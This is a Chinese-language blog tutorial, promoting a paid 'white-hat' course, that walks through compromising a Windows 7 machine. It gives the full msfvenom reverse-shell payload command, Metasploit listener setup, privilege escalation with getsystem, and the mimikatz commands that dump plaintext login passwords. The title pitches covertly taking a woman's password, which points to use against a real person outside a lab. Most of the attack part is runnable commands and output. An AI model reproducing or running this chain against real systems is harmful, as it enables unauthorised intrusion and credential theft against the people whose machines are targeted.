<返回更多

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

2020-06-19    
加入收藏

在kali渗透之内网渗透中,黑客都会想方设法在目标设备中获取重要的文件或资料,其中获得密码就是一件重要的事!小白学习白帽黑客kali渗透,前往下方专栏即可!

 

什么是mimikatz

之前课程讲解过,xp系统的SAM和SYSTEM文件是可以在备份文件repair中进行有权提取的,但是Win7系统并没有这个备份目录,更无法直接从system32/config下提取SAM和SYSTEM!

既然不能提取,我们就使用特殊的工具来直接打入目标系统中,进行越权提取!所以这里要用到法国小伙编写的一款神器mimikatz,将它上传到目标系统中,进而直接从目标系统中破解出明文密码!

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

获得meterpreter会话

有人问,我都进入对方电脑了,还要密码干嘛?这里获得的密码有助于横向渗透,一般开机密码,是打开其他局域网电脑的钥匙,更是电脑某些服务的登陆密码,所以这些凭证很重要!

环境:

使用kali-2020,建议进入root!(输入su,输入密码即可!)

使用win7靶机

使用meterpreter建立的会话获得远程windows的SAM文件!

这种方式适用于测试的靶机已经运行了你的免杀木马可执行载荷,也就说使用我们的kali已经获得了靶机的meterpreter会话!

使用msfvenom生成windows有效载荷(一般木马),kali终端下输入:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.206 LPORT=8888 -f exe > test.exe

LHOST是你kali的桥接网络IP;LPORT随便设置,只要不和其他冲突即可。

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

将主目录下生成的可执行木马载荷放到kali的/var/www/html中,并且删除html目录下.html为后缀的文件(没有就不用管!)

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

开启kali的Apache2服务,在终端中输入:

 service apache2 start

Apache2可以提供基本的web服务,也就是说远程的靶机可以访问kali的ip就可以自动访问kali的/va/www/html/下的文件,进行访问下载!Apache2此时就相当于一个小型服务器!

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

win7靶机(桥接网络)浏览器访问:192.168.31.206,然后选中test.exe.进行下载到桌面。

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

kali,启动metasploit工具,并设置监听:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.31.206
set lport 8888
run
内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

既然已经设置了监听,我们直接去win7模拟运行有效载荷test.exe,然后就会看到kali的metasploit就会收到会话!

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

我们已经获得了win7靶机的meterpreter会话,现在我们可以通过一个meterpreter命令"hashdump"就可以直接下载win7靶机的hash文件,这里获取的不是被二次加密的SAM文件,而是自动获取win7被解密后的SAM文件形成的hash值!

但是我们首先需要看下当前获得的会话是什么权限?输入"getuid"

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

管理员权限,不是system权限,无法提取hash值,我们第一步就需要直接输入"getsystem"来使用meterpreter默认的技术进行win7提权!看看能不能变成system权限。执行完毕,输入getuid查看,已经是system权限!Bingo!

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

知识补充,如果输入getsystem无法提权,这就需要其他的利用模块绕过win7的提权,这里暂时不讲,以后会讲解!

我们输入"hashdump",看看是否得到hash值

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

很不幸,没有得到我们想要的hash值,原因是部分win7系统拒绝metasploit进行访问提取hash!怎么办?我们继续试探!

上传mimikatz

既然直接输入hashdump不行,我们试试上传破解工具到win7靶机中进行远程抓取!

已经加入专栏课程《白帽黑客kali初学指南》的学员,可以直接在我们的专栏资料库中找到mimikatz!

没有加入的,可以点击>>《白帽黑客kali初学指南》加入专栏,然后私信@小白嘿客获取专栏资料库

这里提醒:根据目标系统的位数,请在资料库中选择不同版本的mimikatz!

上传命令是:

upload Win32 c:\
内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

然后在meterpreter中输入"shell"进入win7靶机的cmd终端模拟器。如果出现乱码,输入chcp 65001即可解决乱码。

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

这里获得的cmd显示在对方的桌面中,我们应该切换到c盘根目录下,你发现cmd此时就在c:下,然后输入dir查看验证下远程的win7靶机c盘是否有我们上传上去的mimikatz工具!

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

在cmd中输入"mimikatz.exe"远程启动我们的破解工具。

这里需要提醒,如果之前的meterpreter会话断开过,需要重新建立,而且要保证已经使用meterpreter的getsystem命令进行了本地对远程win7靶机的提权!否则mimikatz.exe可能无法运行,不过亲身尝梨知酸甜,还需要亲身实践哈!

输入"mimikatz.exe"运行我们的破解工具。

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

然后输入privilege::debug,显示20 ok即可完成提权!

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

然后输入sekurlsa::logonPasswords,开始远程抓取win7靶机的hash值!你会很开心的!看下图!

理论上会将win7靶机的所有用户以及密码都打印在meterpreter会话中的模拟cmd窗口中!我们这里只关注Administrator这个管理员用户!

你此时发现SHA1这种hash值根本就不用解密,红色的框中已经自动解密出密码123456,用户Administrator了!

内网渗透神器:使用mimikatz悄悄提取妹子Win7密码

 

到此,我们利用meterpreter会话上传mimikatz工具到win7靶机上,然后在kali中实现操控靶机的cmd,成功破解出了明文口令!根本就不需要拿到hash值。

小白嘿客我想说

更多网络安全、白帽黑客入门到实战技术,可以前往下方专栏进行学习,你也能快速成为渗透大神!

→《从新手到web白帽黑客》,网站渗透侵入的深入浅出教程:

 

→《Android/ target=_blank class=infotextkey>安卓手机渗透测试》,将手机打造成功嘿客神器并渗透安卓手机:

 

→《网络安全训练营》,和众多kali爱好者一起交流、学习,还有更多技术干货:

声明:本站部分内容来自互联网,如有版权侵犯或其他问题请与我们联系,我们将立即删除或处理。
▍相关推荐
更多资讯 >>>